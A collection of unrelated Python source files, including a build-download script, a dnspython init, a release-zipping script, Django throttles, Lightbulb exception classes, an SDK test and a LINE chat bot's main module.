saved_dir = os.getcwd()
os.chdir(directory)
return_code = bisect_utils.RunProcess(command)
os.chdir(saved_dir)
return return_code
def _UnzipUsingZipFile(file_path, output_dir, verbose=True):
"""Extracts a zip file using the Python zipfile module."""
assert bisect_utils.IsWindowsHost() or bisect_utils.IsMacHost()
zf = zipfile.ZipFile(file_path)
for name in zf.namelist():
if verbose:
print 'Extracting %s' % name
zf.extract(name, output_dir)
if bisect_utils.IsMacHost():
# Restore file permission bits.
mode = zf.getinfo(name).external_attr >> 16
os.chmod(os.path.join(output_dir, name), mode)
def _MakeDirectory(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _RemoveDirectoryTree(path):
try:
if os.path.exists(path):
shutil.rmtree(path)
except OSError, e:
if e.errno != errno.ENOENT:
raise
def Main(argv):
"""Downloads and extracts a build based on the command line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument('builder_type')
parser.add_argument('revision')
parser.add_argument('output_dir')
parser.add_argument('--target-arch', default='ia32')
parser.add_argument('--target-platform', default='chromium')
parser.add_argument('--deps-patch-sha')
args = parser.parse_args(argv[1:])
bucket_name, remote_path = GetBucketAndRemotePath(
args.revision, args.builder_type, target_arch=args.target_arch,
target_platform=args.target_platform,
deps_patch_sha=args.deps_patch_sha)
print 'Bucket name: %s, remote path: %s' % (bucket_name, remote_path)
if not BuildIsAvailable(bucket_name, remote_path):
print 'Build is not available.'
return 1
FetchFromCloudStorage(bucket_name, remote_path, args.output_dir)
print 'Build has been downloaded to and extracted in %s.' % args.output_dir
return 0
if __name__ == '__main__':
sys.exit(Main(sys.argv))
|
py | b4036ae23fdef55c87b07b5c4a2437caa85a4028 | #list comprehensions
#printing only even numbers in a list
import random
y = int(input("Enter the number of elements in the list:"))
x = (random.sample(range(1,100),y))
print(x)
new_list1=[]
new_list2=[]
for i in x:
if i%2 == 0:
new_list1.append(i)
else:
new_list2.append(i)
print("The even elements are: ")
print(new_list1)
print("The odd elements are: ")
print(new_list2)
|
py | b4036afd34f509c3c180d268a555695dc59c70a4 | # Copyright (C) 2003-2005 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""dnspython DNS toolkit"""
__all__ = [
'dnssec',
'e164',
'exception',
'flags',
'inet',
'ipv4',
'ipv6',
'message',
'name',
'namedict',
'node',
'opcode',
'query',
'rcode',
'rdata',
'rdataclass',
'rdataset',
'rdatatype',
'renderer',
'resolver',
'reversename',
'rrset',
'set',
'tokenizer',
'tsig',
'tsigkeyring',
'ttl',
'rdtypes',
'update',
'version',
'zone',
]
|
py | b4036b3d7abc5a0b45c81aa35841ea63611dc7b5 | from pathlib import Path
import hashlib
import subprocess
import sys
import zipfile
if len(sys.argv) < 2:
print('Please specify the release version as the first argument, e.g. ./publish.py 1.21')
exit(-1)
version = sys.argv[1]
subprocess.run(['git', 'fetch', '--tags'], check=True)
output = subprocess.run(['git', 'tag', version])
if output.returncode != 0:
print(f'Tag {version} already exists. Please choose another one.')
exit(-2)
paths = [
Path('application.py'),
Path('application_database.py'),
Path('application_login.py'),
Path('application_utils.py'),
Path('data'),
Path('engine'),
Path('pages'),
Path('requirements.txt'),
Path('requirements'),
# Path('.ebextensions/https-instance.config'),
Path('install-google-chrome.sh'),
Path('robots.txt'),
]
all_paths = []
for path in paths:
if path.is_file():
all_paths.append(path)
else:
all_paths += list(path.glob('**/*'))
# path = path.parent / (path.stem + path.suffix)
# path = path.parent / path.name
replacements = {'%version%': version}
for path in all_paths:
if path.suffix == '.js':
hash = hashlib.sha256()
hash.update(path.read_bytes())
replacements[path.name] = f'{path.stem}-{hash.hexdigest()[:8]}{path.suffix}'
z = zipfile.ZipFile(f'{version}.zip', 'w')
root = Path(__file__).parent.resolve()
for path in all_paths:
path = path.resolve()
arcname = str(path.relative_to(root))
if path.suffix in ['.js', '.html', '.py']:
with path.open() as f:
contents = f.read()
for key in replacements:
contents = contents.replace(key, replacements[key])
arcname = arcname.replace(key, replacements[key])
z.writestr(arcname, contents)
else:
z.write(path, arcname)
z.close()
subprocess.run(['git', 'push', 'origin', version], check=True)
|
py | b4036c9cf484b99b7638332a3b9fa8bc066fe84a | from rest_framework.throttling import SimpleRateThrottle
class AnonThrottle(SimpleRateThrottle):
scope = 'anon'
def get_cache_key(self, request, view):
if request.user:
if request.user.user_type == 2:
ident = request.user.pk
return self.cache_format % {
'scope': self.scope,
'ident': ident
}
class UserThrottle(SimpleRateThrottle):
scope = 'user'
def get_cache_key(self, request, view):
if request.user:
ident = request.user.pk
else:
ident = self.get_ident(request)
return self.cache_format % {
'scope': self.scope,
'ident': ident
}
|
py | b4036e951faf49ff07dc968aaf57a7c15fa075ec | # -*- coding: utf-8 -*-
# Copyright © tandemdude 2020-present
#
# This file is part of Lightbulb.
#
# Lightbulb is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Lightbulb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Lightbulb. If not, see <https://www.gnu.org/licenses/>.
from __future__ import annotations
__all__ = [
"LightbulbError",
"UnsupportedResponseOperation",
"ApplicationCommandCreationFailed",
"CommandNotFound",
"CommandInvocationError",
"CommandIsOnCooldown",
"ConverterFailure",
"NotEnoughArguments",
"MissingRequiredAttachmentArgument",
"MaxConcurrencyLimitReached",
"CheckFailure",
"InsufficientCache",
"NotOwner",
"OnlyInGuild",
"OnlyInDM",
"BotOnly",
"WebhookOnly",
"HumanOnly",
"NSFWChannelOnly",
"ExtensionMissingUnload",
"ExtensionNotFound",
"ExtensionNotLoaded",
"ExtensionMissingLoad",
"ExtensionAlreadyLoaded",
"CommandAlreadyExists",
"MissingRequiredRole",
"MissingRequiredPermission",
"BotMissingRequiredPermission",
"MissingRequiredAttachment",
]
import typing as t
import warnings
import hikari
if t.TYPE_CHECKING:
from lightbulb import commands
class LightbulbError(Exception):
"""
Base lightbulb exception class. All errors raised by lightbulb will be a subclass
of this exception.
"""
class UnsupportedResponseOperation(LightbulbError):
"""
Exception raised when ``edit`` or ``delete`` is called on a response that cannot be
edited and/or deleted (generally occurs for ephemeral responses).
"""
class ApplicationCommandCreationFailed(LightbulbError):
"""Exception raised when initialisation of application commands fails."""
class ExtensionNotFound(LightbulbError):
"""Exception raised when an attempt is made to load an extension that does not exist."""
class ExtensionAlreadyLoaded(LightbulbError):
"""Exception raised when an extension already loaded is attempted to be loaded."""
class ExtensionMissingLoad(LightbulbError):
"""Exception raised when an extension is attempted to be loaded but does not contain a load function"""
class ExtensionMissingUnload(LightbulbError):
"""Exception raised when an extension is attempted to be unloaded but does not contain an unload function"""
class ExtensionNotLoaded(LightbulbError):
"""Exception raised when an extension not already loaded is attempted to be unloaded."""
class CommandAlreadyExists(LightbulbError):
"""
Error raised when attempting to add a command to the bot but a name or alias
for the command conflicts with a command that already exists.
"""
class CommandNotFound(LightbulbError):
"""
Error raised when a command is attempted to be invoked but an implementation
is not found. This will only be raised for prefix commands.
"""
__slots__ = ("invoked_with",)
def __init__(self, *args: t.Any, invoked_with: str) -> None:
super().__init__(*args)
self.invoked_with: str = invoked_with
"""The name or alias of the command that was used."""
class CommandInvocationError(LightbulbError):
"""
Error raised when an error is encountered during command invocation. This
wraps the original exception that caused it, which is accessible through
``CommandInvocationError.__cause__`` or ``CommandInvocationError.original``.
"""
__slots__ = ("original",)
def __init__(self, *args: t.Any, original: Exception) -> None:
super().__init__(*args)
self.original: Exception = original
"""The exception that caused this to be raised. Also accessible through ``CommandInvocationError.__cause__``"""
self.__cause__ = original
class CommandIsOnCooldown(LightbulbError):
"""
Error raised when a command was on cooldown when it was attempted to be invoked.
"""
__slots__ = ("retry_after",)
def __init__(self, *args: t.Any, retry_after: float) -> None:
super().__init__(*args)
self.retry_after: float = retry_after
"""The amount of time in seconds remaining until the cooldown expires."""
class ConverterFailure(LightbulbError):
"""
Error raised when option type conversion fails while prefix command arguments are being parsed.
"""
__slots__ = ("option", "raw_value")
def __init__(self, *args: t.Any, opt: commands.base.OptionLike, raw: str) -> None:
super().__init__(*args)
self.option: commands.base.OptionLike = opt
"""The option that could not be converted."""
self.raw_value: str = raw
"""The value that could not be converted."""
class NotEnoughArguments(LightbulbError):
"""
Error raised when a prefix command expects more options than could be parsed from the user's input.
"""
__slots__ = ("missing_options",)
def __init__(self, *args: t.Any, missing: t.Sequence[commands.base.OptionLike]) -> None:
super().__init__(*args)
self.missing_options: t.Sequence[commands.base.OptionLike] = missing
"""The missing options from the command invocation."""
class MissingRequiredAttachmentArgument(LightbulbError):
"""
Error raised when a prefix command expects an attachment but none were supplied with the invocation.
"""
__slots__ = ("missing_option",)
def __init__(self, *args: t.Any, missing: commands.base.OptionLike) -> None:
super().__init__(*args)
self.missing_option: commands.base.OptionLike = missing
"""The missing attachment option from the command invocation."""
class MaxConcurrencyLimitReached(LightbulbError):
"""
Error raised when the maximum number of allowed concurrent invocations for a command
has been exceeded.
"""
class CheckFailure(LightbulbError):
"""
Error raised when a check fails before command invocation. If another error caused this
to be raised then you can access it using ``CheckFailure.__cause__``, or in the case of
multiple checks failing, via ``CheckFailure.causes``.
"""
__slots__ = ("causes",)
def __init__(self, *args: t.Any, causes: t.Optional[t.Sequence[Exception]] = None) -> None:
super().__init__(*args)
self.causes: t.Sequence[Exception] = causes or []
class InsufficientCache(CheckFailure):
"""
Error raised when the cache is required for an operation but either could not be accessed
or did not return the required object.
"""
class NotOwner(CheckFailure):
"""
Error raised when a user who is not the owner of the bot attempts to use a command
that is restricted to owners only.
"""
class OnlyInGuild(CheckFailure):
"""
Error raised when a user attempts to use a command in DMs that has been restricted
to being used only in guilds.
"""
class OnlyInDM(CheckFailure):
"""
Error raised when a user attempts to use a command in a guild that has been restricted
to being used only in DMs.
"""
class BotOnly(CheckFailure):
"""
Error raised when any entity other than a bot attempts to use a command that has been
restricted to being used only by bots.
"""
class WebhookOnly(CheckFailure):
"""
Error raised when any entity other than a webhook attempts to use a command that has been
restricted to being used only by webhooks.
"""
class HumanOnly(CheckFailure):
"""
Error raised when any entity other than a human attempts to use a command that has been
restricted to being used only by humans.
"""
class NSFWChannelOnly(CheckFailure):
"""
Error raised when a user attempts to use a command in a non-NSFW channel that has
been restricted to only being used in NSFW channels.
"""
class MissingRequiredRole(CheckFailure):
"""
Error raised when the member invoking a command is missing one or more of the required roles.
"""
class MissingRequiredPermission(CheckFailure):
"""
Error raised when the member invoking a command is missing one or more of the required permissions
in order to be able to run the command.
"""
def __init__(self, *args: t.Any, perms: hikari.Permissions) -> None:
super().__init__(*args)
self.missing_perms: hikari.Permissions = perms
"""The permissions that the member is missing."""
class BotMissingRequiredPermission(CheckFailure):
"""
Error raised when the bot is missing one or more of the required permissions
in order to be able to run the command.
"""
def __init__(self, *args: t.Any, perms: hikari.Permissions) -> None:
super().__init__(*args)
self.missing_perms: hikari.Permissions = perms
"""The permissions that the bot is missing."""
class MissingRequiredAttachment(CheckFailure):
"""
Error raised when an attachment is required for the command but none were supplied with the invocation.
"""
def __init__(self, *args: t.Any, **kwargs: t.Any) -> None:
warnings.warn(
"'MissingRequiredAttachment' is deprecated and scheduled for removal in version '2.5.0'. "
"Use an option with type 'hikari.Attachment' and catch 'MissingRequiredAttachmentArgument' instead.",
DeprecationWarning,
)
super().__init__(*args, **kwargs)
|
py | b4036ea4f8240287ea74adc6b59d4257ed2fb7f1 | import numpy as np
class Experience:
def __init__(self, state: np.ndarray, action: np.ndarray, reward: float, next_state: np.ndarray, done: bool):
self.state = state
self.action = action
self.reward = reward
self.next_state = next_state
self.done = done
def as_tuple(self):
"""
Returns in tuple as (state, action, reward, next_state, done)
:return:
"""
return self.state, self.action, self.reward, self.next_state, self.done
class InsufficientExperiencesError(Exception):
pass
|
py | b403705e02f96187143b2a5e33406f81e434bd79 | # -*- coding: utf-8 -*-
from helper import IcebergUnitTestCase, get_api_handler
from icebergsdk.api import IcebergAPI
from icebergsdk.exceptions import IcebergClientUnauthorizedError
class TestApplication(IcebergUnitTestCase):
@classmethod
def setUpClass(cls):
cls.my_context_dict = {}
cls._objects_to_delete = []
def test_01_create(self, namespace=None, name=None, contact_user=None):
"""
Test Create an Application
"""
self.direct_login_user_1()
data = {}
if namespace:
data['namespace'] = namespace
if name:
data['name'] = name
if contact_user:
data['contact_user'] = contact_user
new_application = self.create_application(**data)
self._objects_to_delete.append(new_application)
self.my_context_dict["new_application"] = new_application
app_found = False
for app in self.api_handler.User.me().applications():
if app.id == new_application.id:
app_found = True
break
self.assertTrue(app_found)
# merchants
new_application.merchants()
return new_application
def test_02_sso_read(self):
"""
Test SSO Read an Application
- Fetch the application secret key
- SSO Login on this application
- Assert authorized read detail by contact_user
"""
self.direct_login_user_1()
new_application = self.my_context_dict["new_application"]
previous_conf = self.api_handler.conf
new_conf = previous_conf() ## here we instanciate the previous conf so that we can modify some values without changing the class values
new_conf.ICEBERG_APPLICATION_SECRET_KEY = str(new_application.fetch_secret_key())
new_conf.ICEBERG_APPLICATION_NAMESPACE = str(new_application.namespace)
self.api_handler = IcebergAPI(conf = new_conf)
self.login_user_1()
application = self.api_handler.Application.find(new_application.id)
self.assertFalse(application==None)
# self.login_user_2()
# try:
# application = self.api_handler.Application.find(new_application.id)
# except IcebergClientUnauthorizedError:
# ## should raise this exception
# pass
# else:
# raise Exception("Application should not be accessible by user_2")
self.api_handler.conf = previous_conf
def test_03_delete(self, application=None):
"""
Test Delete an Application
"""
self.direct_login_user_1()
self.my_context_dict["new_application"].delete()
if self.my_context_dict["new_application"] in self._objects_to_delete:
## no need to delete it in tearDownClass if delete succeeded
self._objects_to_delete.remove(self.my_context_dict["new_application"])
@classmethod
def tearDownClass(cls):
if hasattr(cls, "_objects_to_delete"):
api_handler = get_api_handler()
api_handler.auth_user(username="staff_iceberg", email="[email protected]", is_staff = True)
for obj in cls._objects_to_delete:
try:
obj.delete(handler = api_handler)
# print "obj %s deleted" % obj
except:
pass
# print "couldnt delete obj %s" % obj
|
py | b4037101097d7f6401d7e8e5a235225b0634064a | # -*- coding: utf-8 -*-
# imports - standard imports
from setuptools import setup, find_packages
import re
import ast
# get version from __version__ variable in frappe/__init__.py
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('requirements.txt') as f:
install_requires = f.read().strip().split('\n')
with open('frappe_s3_attachment/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='frappe_s3_attachment',
version=version,
description='Frappe app to make file upload to S3 through attach file option.',
author='Frappe',
author_email='[email protected]',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires,
dependency_links=[]
)
|
py | b40371233c4131dcedb27e89e906952d40a0c6d8 |
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from time import sleep
from line2.client import Client, OAClient, UserClient
from line2.models.types import Receiver, Type, EventType, MessageType, ChatroomType, ParameterType, WhenOALeave
from line2.models.events import Event, Message, TextMessage, ImageMessage
from line2.models.messages import Buttons
from line2.models.chatrooms import User, Room, Group
from line2.models.command import Command, Parameter
from line2.models.database import Database
from commands.coin import coinCmd
from commands.randint import randintCmd
from commands.commandlist import commandListCmd
from commands.robj import rObjCmd
from commands.mocksb import mockSBCmd
from commands.echo import echoCmd
from commands.sort import sortCmd
from commands.sort2 import sort2Cmd
from commands.sort3 import sort3Cmd
from commands.emoji import emojiCmd
from commands.vapor import vaporCmd
from commands.meme import memeCmd
from commands.space import spaceCmd
from commands.clap import clapCmd
from commands.title import titleCmd
from commands.exactreply import exactReplyCmd
from commands.regexreply import regexReplyCmd
from commands.jpeg import jpegCmd
from commands.deepfry import deepFryCmd
from commands import deepart
from commands.deepart import deepArtCmd
from commands.lunapic import lunaPicCmd
from commands.werewolf import werewolfCmd
from commands.twentyfour import twentyFourCmd
from commands.twentyfour2 import twentyFour2Cmd
from commands.byksw import bykswCmd
from traceback import format_exc
from argparse import ArgumentParser
def HandleEvent(event):
global client
if event.eventType == EventType.message:
if event.messageType == MessageType.text:
sender = event.sender
chatroom = event.chatroom
if event.text == '/info':
c = event.client
s = 'Receiver=' + Receiver.toString[event.receiver] + "\nhasOA " + str(c.hasOA) + "\nhasUser " + str(c.hasUser) + "\n"
sender = event.sender
chatroom = event.chatroom
if sender is not None:
s = s + "Sender : " + str(sender) + "\n_2id=" + str(sender._2id) + "\nid='" + str(sender.id) + "'\nmid='" + str(sender.mid) + "'\nhasOA " + str(sender.hasOA) + "\nhasUser " + str(sender.hasUser) + "\n"
if sender != chatroom:
s = s + "Chatroom : " + str(chatroom) + "\n_2id=" + str(chatroom._2id) + "\nid='" + str(chatroom.id) + "'\nmid='" + str(chatroom.mid) + "'\nhasOA " + str(chatroom.hasOA) + "\n_1hasOA " + str(chatroom._1hasOA) + "\n_2hasOA " + str(chatroom._2hasOA) + "\nhasUser " + str(chatroom.hasUser)
event.ReplyText(s)
if event.text == '/info2':
c = event.client
s = 'Receiver=' + Receiver.toString[event.receiver] + "\nhasOA " + str(c.hasOA) + "\nhasUser " + str(c.hasUser) + "\n"
sender = event.sender
chatroom = event.chatroom
if sender is not None:
s = s + "Sender : " + str(sender) + "\n_2id=" + str(sender._2id) + "\nname : " + str(sender.name) + "\nid='" + str(sender.id) + "'\nmid='" + str(sender.mid) + "'\nhasOA " + str(sender.hasOA) + "\nhasUser " + str(sender.hasUser) + "\n"
if sender != chatroom:
s = s + "Chatroom : " + str(chatroom) + "\n_2id=" + str(chatroom._2id) + "\nname : " + str(chatroom.name) + "\nid='" + str(chatroom.id) + "'\nmid='" + str(chatroom.mid) + "'\nhasOA " + str(chatroom.hasOA) + "\nhasUser " + str(chatroom.hasUser)
event.ReplyText(s)
if event.text == "/name":
event.ReplyText(str(event.sender.GetName()))
if event.text == "/memberids":
if event.chatroom.chatroomType != ChatroomType.user:
if event.sender:
if event.sender.isAdmin:
if event.chatroom.hasOA:
if event.chatroom.chatroomType == ChatroomType.group:
event.ReplyText(str(event.client.oAClient._1client.get_group_member_ids(event.chatroom.id)))
else:
event.ReplyText(str(event.client.oAClient._1client.get_room_member_ids(event.chatroom.id)))
else:
event.ReplyText("NOT HASOA")
else:
event.ReplyText("You're not an admin")
else:
event.ReplyText("Can't identify you")
else:
event.ReplyText("Room/group only")
if event.text == "/robjtest":
if event.sender:
if True:#event.sender.isAdmin:
rObj = event.sender.rObj
if rObj:
rObj.SendText("Hello from /robj")
else:
event.ReplyText("%s, please type '/robj' in a room consisting of only you, our UserClient, and our OAClient" % event.sender.name)
else:
event.ReplyText("You're not an admin")
else:
event.ReplyText("Can't identify you")
elif event.text == "/clearrooms" and False:
if event.sender:
if event.client.hasUser:
rooms = event.client.userClient._1GetAllActiveRooms()
for room in rooms:
room.Leave()
event.ReplyText("Left %d rooms" % len(rooms))
with event.client.GetCursor() as cur:
cur.Execute("SELECT lineMid from ChatRooms WHERE type=%s AND lineMid IS NOT NULL", (ChatroomType.room,))
i = 0
for f in cur.FetchAll():
room = event.client.userClient._1GetObjByLineMid(f[0])
if room and room.chatroomType == ChatroomType.room and room.hasUser:
room.SendText("I'm leaving")
room.Leave()
i+=1
event.ReplyText("Left %d rooms (2)" % i)
else:
event.ReplyText("NOT hasUser")
else:
event.ReplyText("Can't identify you")
if event.text == "/buttons":
try:
but = Buttons("ALT TEXT HEADER", "COLUMN TEXT")
for i in range(0, 20):
but.AddButton(
"Label %d" % i,
"Pressed %d" % i,
"\nAlt Text %d" % i
)
event.ReplyButtons(but)
except Exception as e:
event.ReplyText(format_exc())
#else:
# event.ReplyImageWithUrl(event.url)
# event.ReplyText("Image message id : " + str(event.id))
if event.eventType == EventType.invited:
event.Accept()
if event.eventType == EventType.joined:
event.chatroom.SendText("Hello I just joined")
port = None
if __name__ == "__main__":
arg_parser = ArgumentParser(
usage='Usage: python ' + __file__ + ' [--port <port>] [--help]'
)
arg_parser.add_argument('-p', '--port', default=5000, help='port')
options = arg_parser.parse_args()
port = int(options.port)
global client
client = Client(
channelAccessToken = "",
channelSecret = "",
#email = "",
#password = "",
authToken = None,
certificate = None,
tries = 5,
reauthDelay = 7200,
adminIds = [],
adminMids = [],
dbUrl = '',
handler = HandleEvent,
isMac = False,
initAll = False,
autoAcceptInvitation = True,
oAAutoLeaveWhenUserLeave = True,
whenOALeave = WhenOALeave.reinvite,
port=port,
pyImgurKey = "",
pingAddress = "",
)
client.AddCommand(commandListCmd)
client.AddCommand(commandListCmd, name="commands")
client.AddCommand(rObjCmd)
client.AddCommand(rObjCmd, name='register')
client.AddCommand(coinCmd)
client.AddCommand(randintCmd)
client.AddCommand(mockSBCmd)
client.AddCommand(echoCmd)
client.AddCommand(sortCmd)
client.AddCommand(sort2Cmd)
client.AddCommand(sort3Cmd)
client.AddCommand(emojiCmd)
client.AddCommand(vaporCmd)
client.AddCommand(spaceCmd)
client.AddCommand(clapCmd)
client.AddCommand(titleCmd)
client.AddCommand(memeCmd)
client.AddAdminCommand(memeCmd)
client.AddCommand(jpegCmd)
client.AddCommand(deepFryCmd)
client.AddCommand(deepFryCmd, name="df")
deepart.daEmail = ''
deepart.daPw = ''
client.AddCommand(deepArtCmd)
client.AddCommand(deepArtCmd, name="da")
#client.AddCommand(lunaPicCmd)
#client.AddCommand(lunaPicCmd, name="lp")
client.AddContinuousTextCommand(exactReplyCmd)
client.AddCommand(exactReplyCmd)
client.AddCommand(exactReplyCmd, name="er")
client.AddContinuousTextCommand(regexReplyCmd)
client.AddCommand(regexReplyCmd)
client.AddCommand(regexReplyCmd, name="rr")
#client.AddCommand(twentyFour2Cmd)
#client.AddCommand(twentyFour2Cmd, name="242")
#client.AddContinuousTextCommand(twentyFour2Cmd)
client.AddCommand(twentyFourCmd)
client.AddCommand(twentyFourCmd, name="24")
client.AddContinuousTextCommand(twentyFourCmd)
#client.AddCommand(werewolfCmd)
client.AddCommand(bykswCmd)
def application(environ, start_response):
global client
return client.HandleWebhook(environ, start_response)
if __name__ == "__main__":
client.StartOA(thread=True, port=port)
client.StartUser(thread=5, mode=10)
print("DONE")
while True:
sleep(1) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.